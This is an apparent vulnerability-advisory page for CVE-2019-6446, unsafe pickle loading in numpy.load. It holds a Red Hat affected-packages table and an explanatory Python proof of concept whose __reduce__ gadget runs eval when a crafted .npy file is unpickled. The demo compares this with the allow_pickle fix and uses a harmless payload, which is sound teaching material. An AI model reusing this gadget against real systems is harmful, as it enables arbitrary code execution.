
CVE-2019-6446

Published: 16 Jan 2019
Source: redhat
CVSS3: 8.8
EPSS: Medium

Description

An issue was discovered in NumPy before 1.16.3. It uses the pickle Python module unsafely, which allows remote attackers to execute arbitrary code via a crafted serialized object, as demonstrated by a numpy.load call. NOTE: third parties dispute this issue because it is a behavior that might have legitimate applications in (for example) loading serialized Python object arrays from trusted and authenticated sources.
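The description above says numpy.load "uses the pickle Python module unsafely": a .npy file whose header declares an object dtype carries its payload as a pickle stream, and before 1.16.3 numpy.load unpickled it by default. The following is an added example, not numpy's code or part of this advisory, that models the two behaviours without depending on numpy: a minimal .npy builder (construct-only test input), a pre-1.16.3 loader that unpickles object arrays unconditionally, and a loader mirroring the fix, where allow_pickle defaults to False. The names build_npy, Exploit, load_pre_1_16_3, load_fixed and run_demo are this example's own; the "payload" is a harmless eval of the current PID, standing in for whatever an attacker would run.

```python
import ast
import io
import os
import pickle
import struct

MAGIC = b"\x93NUMPY"  # .npy magic string


def build_npy(descr, shape, body):
    """Build a minimal .npy v1.0 stream: magic, version, header length, ASCII header, body.
    (Test-input builder for this example; not numpy's own writer.)"""
    header = f"{{'descr': {descr!r}, 'fortran_order': False, 'shape': {shape!r}, }}"
    # Pad so the whole preamble is a multiple of 64 bytes and the header ends with '\n'.
    preamble = len(MAGIC) + 2 + 2 + len(header) + 1
    header += " " * ((64 - preamble % 64) % 64) + "\n"
    return MAGIC + bytes([1, 0]) + struct.pack("<H", len(header)) + header.encode("latin1") + body


class Exploit:
    """Stand-in for an attacker's object: its pickle stream calls eval() on load.
    The expression is harmless here (returns this process's PID); a real payload
    would call os.system or similar."""

    def __reduce__(self):
        return (eval, ("__import__('os').getpid()",))


def parse_header(buf):
    """Parse the .npy preamble safely (literal_eval, never eval) and return the header dict."""
    if buf.read(len(MAGIC)) != MAGIC:
        raise ValueError("not a .npy file")
    major, _minor = buf.read(2)
    if major == 1:
        (hlen,) = struct.unpack("<H", buf.read(2))
    elif major in (2, 3):
        (hlen,) = struct.unpack("<I", buf.read(4))
    else:
        raise ValueError(f"unsupported .npy version {major}")
    header = ast.literal_eval(buf.read(hlen).decode("latin1"))
    if not isinstance(header, dict) or "descr" not in header:
        raise ValueError("malformed .npy header")
    return header


def is_object_dtype(descr):
    """Object ('O') dtypes are stored as a pickle stream instead of raw element bytes."""
    return "O" in str(descr)


def load_pre_1_16_3(data):
    """Behaviour of numpy.load() before 1.16.3: object arrays are unpickled unconditionally,
    so a crafted file executes attacker-chosen code."""
    buf = io.BytesIO(data)
    header = parse_header(buf)
    if is_object_dtype(header["descr"]):
        return pickle.load(buf)  # runs Exploit.__reduce__ -> eval(...)
    return buf.read()


def load_fixed(data, allow_pickle=False):
    """Behaviour after the 1.16.3 fix: allow_pickle now defaults to False,
    so object arrays are refused unless the caller opts in."""
    buf = io.BytesIO(data)
    header = parse_header(buf)
    if is_object_dtype(header["descr"]):
        if not allow_pickle:
            raise ValueError("Object arrays cannot be loaded when allow_pickle=False")
        return pickle.load(buf)  # opting in restores the pre-fix exposure
    return buf.read()


def run_demo():
    """Exercise both loaders on a crafted object-array file and a benign float array."""
    crafted = build_npy("|O", (1,), pickle.dumps(Exploit()))  # constructed malicious file
    floats = struct.pack("<2d", 1.0, 2.0)
    benign = build_npy("<f8", (2,), floats)  # constructed ordinary float64 array
    results = {"unsafe_ran_payload": load_pre_1_16_3(crafted) == os.getpid()}
    try:
        load_fixed(crafted)
        results["fixed_refused"] = False
    except ValueError:
        results["fixed_refused"] = True
    results["opt_in_still_runs_payload"] = load_fixed(crafted, allow_pickle=True) == os.getpid()
    results["benign_still_loads"] = load_fixed(benign) == floats
    return results


if __name__ == "__main__":
    for name, ok in run_demo().items():
        print(f"{name}: {ok}")
```

Two practical points follow from the demo. The fix is a default change, not a sanitizer: allow_pickle=True on untrusted input is exactly the pre-1.16.3 exposure, which is why the NVD entry notes the dispute over whether this is a bug at all. And the header check only matters once the file is recognised as .npy; numpy.load also falls back to treating a file with neither .npy nor .npz magic as a bare pickle, so the same allow_pickle gate applies there.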

Statement (Red Hat)

Red Hat Enterprise Virtualization Management Appliance includes the vulnerable version of numpy, however it is not used and this vulnerability is not exposed. Red Hat OpenStack Platform includes a vulnerable version of numpy, however it is not used in a vulnerable manner.

Affected packages

Platform                          Package             State          Advisory         Release
Red Hat Ceph Storage 4            numpy               Affected
Red Hat Enterprise Linux 6        numpy               Will not fix
Red Hat Enterprise Linux 7        numpy               Will not fix
Red Hat OpenStack Platform 13 (Queens)   numpy        Will not fix
Red Hat OpenStack Platform 14 (Rocky)    numpy        Will not fix
Red Hat Software Collections      python27-numpy      Will not fix
Red Hat Software Collections      rh-python35-numpy   Will not fix
Red Hat Software Collections      rh-python36-numpy   Will not fix
Red Hat Virtualization 4          rhvm-appliance      Will not fix
Red Hat Enterprise Linux 8        python27            Fixed          RHSA-2019:3335   2019-11-05


Additional information

Severity (Red Hat): Moderate
Weakness: CWE-358->CWE-20
Bugzilla: https://bugzilla.redhat.com/show_bug.cgi?id=1667950 (numpy: crafted serialized object passed in numpy.load() in pickle python module allows arbitrary code execution)

EPSS: 0.61146 (percentile 98%), Medium
CVSS3: 8.8 High

Related vulnerabilities

ubuntu, CVSS3 9.8, almost 7 years ago: description identical to the one above.
nvd, CVSS3 9.8, almost 7 years ago: description identical to the one above.
debian, CVSS3 9.8, almost 7 years ago: description identical to the one above.
suse-cvrf, about 6 years ago: Security update for python-numpy
suse-cvrf, about 6 years ago: Security update for python-numpy
